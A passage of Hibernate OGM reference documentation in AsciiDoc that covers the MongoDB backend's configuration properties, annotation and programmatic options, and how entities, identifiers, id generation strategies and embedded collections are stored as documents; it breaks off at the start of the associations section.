module:\n\n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-mongodb<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\nThis will pull in the MongoDB driver transparently.\n\nIf you're not using a dependency management tool,\ncopy all the dependencies from the distribution in the directories:\n\n* \`\/lib\/required\`\n* \`\/lib\/mongodb\`\n* Optionally - depending on your container - you might need some of the jars from \`\/lib\/provided\`\n\nMongoDB does not require Hibernate Search for the execution of JPQL or HQL queries.\n\n==== MongoDB specific configuration properties\n\nTo get started quickly, pay attention to the following options:\n\n* \`hibernate.ogm.datastore.provider\`\n* \`hibernate.ogm.datastore.host\`\n* \`hibernate.ogm.datastore.database\`\n\nAnd we should have you running.\nThe following properties are available to configure MongoDB support:\n\n.MongoDB datastore configuration properties\nhibernate.ogm.datastore.provider::\nTo use MongoDB as a datastore provider, this property must be set to \`mongodb\`\nhibernate.ogm.option.configurator::\nThe fully-qualified class name or an instance of a programmatic option configurator (see <<ogm-mongodb-programmatic-configuration>>)\nhibernate.ogm.datastore.host::\nThe hostname and port of the MongoDB instance.\nThe optional port is concatenated to the host and separated by a colon.\nWhen using replica sets, you can define the various servers in a comma separated list of hosts and ports.\nLet's see a few valid examples:\n\n* \`mongodb.example.com\`\n* \`mongodb.example.com:27018\`\n* \`2001:db8::ff00:42:8329\` (IPv6)\n* 
`[2001:db8::ff00:42:8329]:27018` (IPv6 with port requires the IPv6 to be surrounded by square brackets)\n* `www.example.com, www2.example.com:123, 192.0.2.1, 192.0.2.2:123, 2001:db8::ff00:42:8329, [2001:db8::ff00:42:8329]:123` (replica set)\n+\nThe default value is `127.0.0.1:27017`. If left undefined, the default port is `27017`.\nhibernate.ogm.datastore.port::\nDeprecated: use `hibernate.ogm.datastore.host`.\nThe port used by the MongoDB instance.\nIgnored when multiple hosts are defined.\nThe default value is `27017`.\nhibernate.ogm.datastore.database::\nThe database to connect to. This property has no default value.\nhibernate.ogm.datastore.create_database::\nIf set to true, the database will be created if it doesn't exist.\nThis property default value is false.\nhibernate.ogm.datastore.username::\nThe username used when connecting to the MongoDB server.\nThis property has no default value.\nhibernate.ogm.datastore.password::\nThe password used to connect to the MongoDB server.\nThis property has no default value.\nThis property is ignored if the username isn't specified.\nhibernate.ogm.error_handler::\nThe fully-qualified class name, class object or an instance of `ErrorHandler` to get notified upon errors during flushes (see <<ogm-api-error-handler>>)\nhibernate.ogm.mongodb.driver.*::\nDefines a prefix for all options which should be passed through to the MongoDB driver.\nFor available options refer to the JavaDocs of link:http:\/\/api.mongodb.org\/java\/3.0\/com\/mongodb\/MongoClientOptions.Builder.html[MongoClientOptions.Builder]. All `String`, `int` and `boolean` properties\ncan be set, eg `hibernate.ogm.mongodb.driver.serverSelectionTimeout`.\nhibernate.ogm.mongodb.authentication_database::\nDefines the name of the authentication database, default value is _admin_.\nhibernate.ogm.mongodb.authentication_mechanism::\nDefines the authentication mechanism to use. Possible values are:\n\n* `BEST`: Handshakes with the server to find the best authentication mechanism.\n* `SCRAM_SHA_1`: The SCRAM SHA 1 Challenge Response mechanism as described in this link:http:\/\/tools.ietf.org\/html\/rfc5802[RFC].\n* `MONGODB_CR`: The MongoDB Challenge Response mechanism (deprecated since MongoDB 3)\n* `GSSAPI`: The GSSAPI mechanism. See the http:\/\/tools.ietf.org\/html\/rfc4752[RFC]\n* `MONGODB_X509`: The MongoDB X.509\n* `PLAIN`: The PLAIN mechanism. 
See the http:\/\/www.ietf.org\/rfc\/rfc4616.txt[RFC].\nhibernate.ogm.datastore.document.association_storage::\nDefines the way OGM stores association information in MongoDB.\nThe following two strategies exist (values of the \`org.hibernate.ogm.datastore.document.options.AssociationStorageType\` enum):\n\n* \`IN_ENTITY\`: store association information within the entity\n* \`ASSOCIATION_DOCUMENT\`: store association information in a dedicated document per association\n\n+\n\`IN_ENTITY\` is the default and recommended option\nunless the association navigation data is much bigger than the core of the document and leads to performance degradation.\nhibernate.ogm.mongodb.association_document_storage::\nDefines how to store association documents (applies only if the \`ASSOCIATION_DOCUMENT\`\nassociation storage strategy is used).\nPossible strategies are (values of the \`org.hibernate.ogm.datastore.mongodb.options.AssociationDocumentStorageType\` enum):\n\n* \`GLOBAL_COLLECTION\` (default): stores the association information in a unique MongoDB collection for all associations\n* \`COLLECTION_PER_ASSOCIATION\`: stores the association in a dedicated MongoDB collection per association\n\nhibernate.ogm.datastore.document.map_storage::\nDefines the way OGM stores the contents of map-typed associations in MongoDB.\nThe following two strategies exist (values of the \`org.hibernate.ogm.datastore.document.options.MapStorageType\` enum):\n\n* \`BY_KEY\`: map-typed associations with a single key column which is of type \`String\` will be stored as a sub-document,\norganized by the given key; not applicable for other types of key columns, in which case always \`AS_LIST\` will be used\n* \`AS_LIST\`: map-typed associations will be stored as an array containing a sub-document for each map entry.\nAll key and value columns will be contained within the array elements\n\nhibernate.ogm.mongodb.write_concern::\nDefines the write concern setting to be applied when issuing writes against the MongoDB datastore.\nPossible settings are (values of the \`WriteConcernType\` enum):\n\`ACKNOWLEDGED\`, \`UNACKNOWLEDGED\`, \`FSYNCED\`, \`JOURNALED\`, \`REPLICA_ACKNOWLEDGED\`, \`MAJORITY\` and \`CUSTOM\`.\nWhen set to \`CUSTOM\`, a custom \`WriteConcern\` implementation type has to be specified.\n+\nThis option is case insensitive and the default value is \`ACKNOWLEDGED\`.\nhibernate.ogm.mongodb.write_concern_type::\nSpecifies a custom \`WriteConcern\` implementation type (fully-qualified name, class object or instance).\nThis is useful in cases where the pre-defined configurations are not sufficient,\ne.g. 
if you want to ensure that writes are propagated to a specific number of replicas or a given \"tag set\".\nOnly takes effect if \`hibernate.ogm.mongodb.write_concern\` is set to \`CUSTOM\`.\nhibernate.ogm.mongodb.read_preference::\nSpecifies the \`ReadPreference\` to be applied when issuing reads against the MongoDB datastore.\nPossible settings are (values of the \`ReadPreferenceType\` enum):\n\`PRIMARY\`, \`PRIMARY_PREFERRED\`, \`SECONDARY\`, \`SECONDARY_PREFERRED\` and \`NEAREST\`.\nIt's currently not possible to plug in custom read preference types.\nIf you're interested in such a feature, please let us know.\n\nFor more information, please refer to the\nhttp:\/\/api.mongodb.org\/java\/current\/com\/mongodb\/WriteConcern.html[official documentation].\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via \`org.hibernate.ogm.datastore.mongodb.MongoDBProperties\`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on \`OgmProperties\`\n(a super interface of \`MongoDBProperties\`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n[[ogm-mongodb-annotation-configuration]]\n==== Annotation based configuration\n\nHibernate OGM allows you to configure store-specific options via Java annotations.\nYou can override global configurations for a specific entity or even a specific property\nby virtue of the location where you place that annotation.\n\nWhen working with the MongoDB backend, you can specify the following settings:\n\n* the write concern for entities and associations using the \`@WriteConcern\` annotation\n* the read preference for entities and associations using the \`@ReadPreference\` annotation\n* a strategy for storing associations using the \`@AssociationStorage\` and \`@AssociationDocumentStorage\` annotations\n* a strategy for storing the contents of map-typed associations using the \`@MapStorage\` annotation\n\nRefer to <<mongodb-associations>> to learn more about the options related to storing associations.\n\nThe following shows an example:\n\n.Configuring the association storage strategy using annotations\n====\n[source, JAVA]\n----\n@Entity\n@WriteConcern(WriteConcernType.JOURNALED)\n@ReadPreference(ReadPreferenceType.PRIMARY_PREFERRED)\n@AssociationStorage(AssociationStorageType.ASSOCIATION_DOCUMENT)\n@AssociationDocumentStorage(AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION)\n@MapStorage(MapStorageType.AS_LIST)\npublic class Zoo {\n\n @OneToMany\n private Set<Animal> animals;\n\n @OneToMany\n private Set<Person> employees;\n\n @OneToMany\n @AssociationStorage(AssociationStorageType.IN_ENTITY)\n private Set<Person> visitors;\n\n \/\/ getters, setters ...\n}\n----\n====\n\nThe \`@WriteConcern\` annotation on the entity level expresses that all writes should be done using the \`JOURNALED\` setting.\nSimilarly, the \`@ReadPreference\` annotation advises the engine to preferably read that entity from the primary node if possible.\nThe other two annotations on the type level specify that all associations of the \`Zoo\`\nclass should be stored in separate association documents, using a dedicated collection per association.\nThis setting applies to the \`animals\` and \`employees\` associations.\nOnly the elements of the \`visitors\` association will be stored in the document of the corresponding \`Zoo\` entity\nas per the configuration of that specific property which takes precedence over the entity-level 
configuration.\n\n[[ogm-mongodb-programmatic-configuration]]\n==== Programmatic configuration\n\nIn addition to the annotation mechanism,\nHibernate OGM also provides a programmatic API for applying store-specific configuration options.\nThis can be useful if you can't modify certain entity types or\ndon't want to add store-specific configuration annotations to them.\nThe API allows you to set options in a type-safe fashion on the global, entity and property levels.\n\nWhen working with MongoDB, you can currently configure the following options using the API:\n\n* write concern\n* read preference\n* association storage strategy\n* association document storage strategy\n* strategy for storing the contents of map-typed associations\n\nTo set these options via the API, you need to create an \`OptionConfigurator\` implementation\nas shown in the following example:\n\n.Example of an option configurator\n====\n[source, JAVA]\n----\npublic class MyOptionConfigurator extends OptionConfigurator {\n\n @Override\n public void configure(Configurable configurable) {\n configurable.configureOptionsFor( MongoDB.class )\n .writeConcern( WriteConcernType.REPLICA_ACKNOWLEDGED )\n .readPreference( ReadPreferenceType.NEAREST )\n .entity( Zoo.class )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT )\n .associationDocumentStorage( AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION )\n .mapStorage( MapStorageType.AS_LIST )\n .property( \"animals\", ElementType.FIELD )\n .associationStorage( AssociationStorageType.IN_ENTITY )\n .entity( Animal.class )\n .writeConcern( new RequiringReplicaCountOf( 3 ) )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT );\n }\n}\n----\n====\n\nThe call to \`configureOptionsFor()\`, passing the store-specific identifier type \`MongoDB\`,\nprovides the entry point into the API. Following the fluent API pattern, you can then configure\nglobal options (\`writeConcern()\`, \`readPreference()\`) and navigate to single entities or properties to apply options\nspecific to these (\`associationStorage()\` etc.).\nThe call to \`writeConcern()\` for the \`Animal\` entity shows how a specific write concern type can be used.\nHere \`RequiringReplicaCountOf\` is a custom implementation of \`WriteConcern\` which ensures\nthat writes are propagated to a given number of replicas before a write is acknowledged.\n\nOptions given on the property level take precedence over entity-level options. So e.g. 
the `animals` association of the `Zoo`\nclass would be stored using the in entity strategy, while all other associations of the `Zoo` entity would\nbe stored using separate association documents.\n\nSimilarly, entity-level options take precedence over options given on the global level.\nGlobal-level options specified via the API complement the settings given via configuration properties.\nIn case a setting is given via a configuration property and the API at the same time,\nthe latter takes precedence.\n\nNote that for a given level (property, entity, global),\nan option set via annotations is overridden by the same option set programmatically.\nThis allows you to change settings in a more flexible way if required.\n\nTo register an option configurator, specify its class name using the `hibernate.ogm.option.configurator` property.\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou also can pass in an `OptionConfigurator` instance or the class object representing the configurator type.\n\n\n[[ogm-mongodb-storage-principles]]\n=== Storage principles\n\nHibernate OGM tries to make the mapping to the underlying datastore as natural as possible\nso that third party applications not using Hibernate OGM can still read\nand update the same datastore.\nWe worked particularly hard on the MongoDB model\nto offer various classic mappings between your object model\nand the MongoDB documents.\n\nTo describe things simply, each entity is stored as a MongoDB document.\nThis document is stored in a MongoDB collection named after the entity type.\nThe navigational information for each association from one entity to (a set of) entity\nis stored in the document representing the entity we are departing from.\n\n[[mongodb-built-in-types]]\n==== Properties and built-in types\n\nEach entity is represented by a document.\nEach property or more precisely column is represented by a field in this document,\nthe field name being the column name.\n\nHibernate OGM supports by default the following property types:\n\n* `java.lang.String`\n\n[source, JSON]\n----\n { \"text\" : \"Hello world!\" }\n----\n\n* `java.lang.Character` (or char primitive)\n\n[source, JSON]\n----\n { \"delimiter\" : \"\/\" }\n----\n\n* `java.lang.Boolean` (or boolean primitive)\n\n[source, JSON]\n----\n { \"favorite\" : true } # default mapping\n { \"favorite\" : \"T\" } # if @Type(type = \"true_false\") is given\n { \"favorite\" : \"Y\" } # if @Type(type = \"yes_no\") is given\n { \"favorite\" : 1 } # if @Type(type = \"numeric_boolean\") is given\n----\n\n* `java.lang.Byte` (or byte primitive)\n\n[source, JSON]\n----\n { \"display_mask\" : \"70\" }\n----\n\n* `java.lang.Byte[]` (or byte[])\n\n[source, JSON]\n----\n { \"pdfAsBytes\" : BinData(0,\"MTIzNDU=\") }\n----\n\n* `java.lang.Short` (or short primitive)\n\n[source, JSON]\n----\n { \"urlPort\" : 80 }\n----\n\n* `java.lang.Integer` (or integer primitive)\n\n[source, JSON]\n----\n { \"stockCount\" : 12309 }\n----\n\n* `java.lang.Long` (or long primitive)\n\n[source, JSON]\n----\n { \"userId\" : NumberLong(\"-6718902786625749549\") }\n----\n\n* `java.lang.Float` (or float primitive)\n\n[source, JSON]\n----\n { \"visitRatio\" : 10.39 }\n----\n\n* `java.lang.Double` (or double primitive)\n\n[source, JSON]\n----\n { \"tax_percentage\" : 12.34 }\n----\n\n* `java.math.BigDecimal`\n\n[source, JSON]\n----\n { \"site_weight\" : \"21.77\" }\n----\n\n* `java.math.BigInteger`\n\n[source, JSON]\n----\n { \"site_weight\" : \"444\" }\n----\n\n* 
`java.util.Calendar`\n\n[source, JSON]\n----\n { \"creation\" : \"2014\/11\/03 16:19:49:283 +0000\" }\n----\n\n* `java.util.Date`\n\n[source, JSON]\n----\n { \"last_update\" : ISODate(\"2014-11-03T16:19:49.283Z\") }\n----\n\n* `java.util.UUID`\n\n[source, JSON]\n----\n { \"serialNumber\" : \"71f5713d-69c4-4b62-ad15-aed8ce8d10e0\" }\n----\n\n* `java.util.URL`\n\n[source, JSON]\n----\n { \"url\" : \"http:\/\/www.hibernate.org\/\" }\n----\n\n* `org.bson.types.ObjectId`\n\n[source, JSON]\n----\n { \"object_id\" : ObjectId(\"547d9b40e62048750f25ef77\") }\n----\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in MongoDB,\nsetting a value to null is the same as removing the field\nin the corresponding object in the db.\n\nThis can have consequences when it comes to queries on null value.\n====\n\n==== Entities\n\nEntities are stored as MongoDB documents and not as BLOBs:\neach entity property will be translated into a document field.\nYou can use `@Table` and `@Column` annotations\nto rename respectively the collection the document is stored in\nand the document's field a property is persisted in.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n}\n----\n====\n\n.Rename field and collection using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n\/\/ Overrides the collection name\n@Table(name = \"News_Collection\")\npublic class News {\n\n @Id\n private String id;\n\n \/\/ Overrides the field name\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"headline\": \"On the merits of NoSQL\",\n}\n----\n====\n\n===== Identifiers\n\n[NOTE]\n====\nHibernate OGM always store identifiers using the `_id` field of a MongoDB document ignoring\nthe name of the property in the entity.\n\nThat's a good thing as MongoDB has special treatment and expectation of the property `_id`.\n====\n\nAn identifier type may be one of the <<mongodb-built-in-types,built-in types>>\nor a more complex type represented by an embedded class.\nWhen you use a built-in type, the identifier is mapped like a regular property.\nWhen you use an embedded class, then the `_id` is representing a nested document\ncontaining the embedded class properties.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"bookmark_1\"\n \"title\" : \"Hibernate OGM documentation\"\n}\n----\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\nNews collection as JSON in MongoDB\n\n[source, JSON]\n----\n\n{\n \"_id\" : {\n \"author\" : \"Guillaume\",\n \"title\" : \"How to use Hibernate OGM ?\"\n },\n \"content\" : \"Simple, just like ORM but with a NoSQL database\"\n}\n\n----\n====\n\nGenerally, it is recommended though to work 
with MongoDB's object id data type.\nThis will facilitate the integration with other applications expecting that common MongoDB id type.\nTo do so, you have two options:\n\n* Define your id property as `org.bson.types.ObjectId`\n* Define your id property as `String` and annotate it with `@Type(type=\"objectid\")`\n\nIn both cases the id will be stored as native `ObjectId` in the datastore.\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n===== Identifier generation strategies\n\nYou can assign id values yourself or let Hibernate OGM generate the value using the\n`@GeneratedValue` annotation.\n\nThere are 4 different strategies:\n\n1. <<mongodb-identity-id-generation-strategy, IDENTITY>> (suggested)\n2. <<mongodb-table-id-generation-strategy, TABLE>>\n3. <<mongodb-sequence-id-generation-strategy, SEQUENCE>>\n4. <<mongodb-auto-id-generation-strategy, AUTO>>\n\n[[mongodb-identity-id-generation-strategy]]\n*1) IDENTITY generation strategy*\n\nThe preferable strategy, Hibernate OGM will create the identifier upon insertion.\nTo apply this strategy the id must be one of the following:\n\n* annotated with `@Type(type=\"objectid\")`\n* `org.bson.types.ObjectId`\n\nlike in the following examples:\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n[[mongodb-table-id-generation-strategy]]\n*2) TABLE generation strategy*\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"GuitarPlayer\",\n \"next_val\" : 101\n}\n----\n====\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnValue = \"guitarPlayer\",\n valueColumnName = \"nextGuitarPlayerId\"\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nGuitarPlayerSequence collection\n\n[source, JSON]\n----\n{\n \"_id\" 
: \"guitarPlayer\",\n \"nextGuitarPlayerId\" : 2\n}\n----\n====\n\n*3) SEQUENCE generation strategy*\n\n[[mongodb-sequence-id-generation-strategy]]\n.SEQUENCE id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE)\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_sequence_name\", \"next_val\" : 21 }\n----\n====\n\n[[mongodb-sequence-id-generation-strategy-custom]]\n.SEQUENCE id generation strategy using custom values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_seq\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_seq\", \"next_val\" : 42 }\n----\n====\n\n[[mongodb-auto-id-generation-strategy]]\n*4) AUTO generation strategy*\n\n[WARNING]\n====\nCare must be taken when using the `GenerationType.AUTO` strategy.\nWhen the property `hibernate.id.new_generator_mappings` is set to `false` (default),\nit will map to the `IDENTITY` strategy.\nAs described before, this requires your ids to be of type `ObjectId` or `@Type(type = \"objectid\") String`.\nIf `hibernate.id.new_generator_mappings` is set to true, `AUTO` will be mapped to the `TABLE` strategy.\nThis requires your id to be of a numeric type.\n\nWe recommend to not use `AUTO` but one of the explicit strategies (`IDENTITY` or `TABLE`) to avoid\npotential misconfigurations.\n\nFor more details you can check the issue https:\/\/hibernate.atlassian.net\/browse\/OGM-663[OGM-663].\n====\n\nIf the property `hibernate.id.new_generator_mappings` is set to `false`,\n`AUTO` will behave as the `IDENTITY` strategy.\n\nIf the property `hibernate.id.new_generator_mappings` is set to `true`,\n`AUTO` will behave as the `SEQUENCE` strategy.\n\n.AUTO id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class DistributedRevisionControl {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nDistributedRevisionControl collection\n\n[source, JSON]\n----\n{ \"_id\" : NumberLong(1), \"name\" : \"Git\" }\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"hibernate_sequence\", \"next_val\" : 2 }\n----\n====\n\n.AUTO id generation strategy wih `hibernate.id.new_generator_mappings` set to false and ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class Comedian {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private ObjectId id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nComedian collection\n\n[source, JSON]\n----\n{ \"_id\" : ObjectId(\"5458b11693f4add0f90519c5\"), \"name\" : \"Louis C.K.\" }\n----\n====\n\n.Entity with @EmbeddedId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic 
class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n\nRendered as JSON in MongoDB\n[source, JSON]\n----\n{\n \"_id\" : {\n \"title\": \"How does Hibernate OGM MongoDB work?\",\n \"author\": \"Guillaume\"\n }\n}\n----\n====\n\n===== Embedded objects and collections\n\nHibernate OGM stores elements annotated with `@Embedded` or `@ElementCollection` as nested documents of the owning entity.\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n \"paper\": {\n \"name\": \"NoSQL journal of prophecies\",\n \"owner\": \"Delphy\"\n }\n}\n----\n====\n\n.@ElementCollection with primitive types\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountWithPhone {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<String> mobileNumbers;\n\n \/\/ getters, setters ...\n}\n----\n\nAccountWithPhone collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john_account\",\n \"mobileNumbers\" : [ \"+1-222-555-0222\", \"+1-202-555-0333\" ]\n}\n----\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"df153180-c6b3-4a4c-a7da-d5de47cf6f00\",\n \"grandChildren\" : [ \"Luke\", \"Leia\" ]\n}\n----\n====\n\nThe class `GrandChild` has only one attribute, `name`;\nthis means that Hibernate OGM doesn't need to store the name of the attribute.\n\nIf the nested document has two or more fields, like in the following example,\nHibernate OGM will store the names of the fields as well.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"e3e1ed4e-c685-4c3f-9a67-a5aeec6ff3ba\",\n \"grandChildren\" :\n [\n {\n \"name\" : \"Luke\",\n \"birth_order\" : 0\n },\n {\n \"name\" : \"Leia\",\n \"birth_order\" : 1\n }\n ]\n}\n----\n====\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"Jane Doe\",\n \"issues\" : {\n \"issueWithNull\" : {\n },\n \"issue2\" : {\n \"number\" : 2000,\n \"project\" : \"OGM\"\n },\n \"issue1\" : {\n \"number\" : 1253,\n \"project\" : \"HSEARCH\"\n }\n }\n}\n----\n====\n\n
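As a quick usage illustration for the map mapping above — a hypothetical sketch in which the accessors and the two-argument `JiraIssue` constructor are assumptions made for brevity:\n\n[source, JAVA]\n----\n\/\/ Hypothetical usage sketch: populating the embeddable map shown above.\n\/\/ The JiraIssue( number, project ) constructor is assumed.\nForumUser user = new ForumUser();\nuser.setName( \"Jane Doe\" );\nuser.getIssues().put( \"issue1\", new JiraIssue( 1253, \"HSEARCH\" ) );\nuser.getIssues().put( \"issue2\", new JiraIssue( 2000, \"OGM\" ) );\n\nem.persist( user );\n----\n\n[NOTE]\n====\nYou can override the column name 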
used for a property of an embedded object.\nBut you need to know that the default column name is the concatenation of the embedding property,\na `.` (dot) and the embedded property (recursively for several levels of embedded objects).\n\nThe MongoDB datastore treats dots specially, as it transforms them into nested documents.\nIf you want to override one column name and still keep the nested structure, don't forget the dots.\n\nThat's a bit abstract, so let's use an example.\n\n[source, JAVA]\n----\n@Entity\nclass Order {\n @Id String number;\n User user;\n Address shipping;\n @AttributeOverrides({\n @AttributeOverride(name=\"name\", column=@Column(name=\"delivery.provider\")),\n @AttributeOverride(name=\"expectedDelaysInDays\", column=@Column(name=\"delivery.delays\"))\n })\n DeliveryProvider deliveryProvider;\n CreditCardType cardType;\n}\n\n\/\/ default columns\n@Embeddable\nclass User {\n String firstname;\n String lastname;\n}\n\n\/\/ override one column\n@Embeddable\npublic class Address {\n String street;\n @Column(name=\"shipping.dest_city\")\n String city;\n}\n\n\/\/ both columns overridden from the embedding side\n@Embeddable\npublic class DeliveryProvider {\n String name;\n Integer expectedDelaysInDays;\n}\n\n\/\/ do not use dots in the overriding\n\/\/ and mix levels (bad form)\n@Embeddable\nclass CreditCardType {\n String merchant;\n @Column(name=\"network\")\n String network;\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\": \"123RF33\",\n \"user\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"shipping\": {\n \"street\": \"1 av des Champs Elys\u00e9es\",\n \"dest_city\": \"Paris\"\n },\n \"delivery\": {\n \"provider\": \"Santa Claus Inc.\",\n \"delays\": \"1\"\n },\n \"network\": \"VISA\",\n \"cardType\": {\n \"merchant\": \"Amazon\"\n }\n}\n----\n\nIf you share the same embeddable in different places, you can use JPA's `@AttributeOverride`\nto override columns from the embedding side.\nThis is the case of `DeliveryProvider` in our example.\n\nIf you omit the dot in one of the columns, this column will not be part of the nested document.\nThis is demonstrated by the `CreditCardType`.\nWe advise you against it.\nLike crossing streams, it is bad form.\nThis approach might not be supported in the future.\n====\n\n[[mongodb-associations]]\n==== Associations\n\nHibernate OGM MongoDB proposes three strategies to store navigation information for associations.\nThe three possible 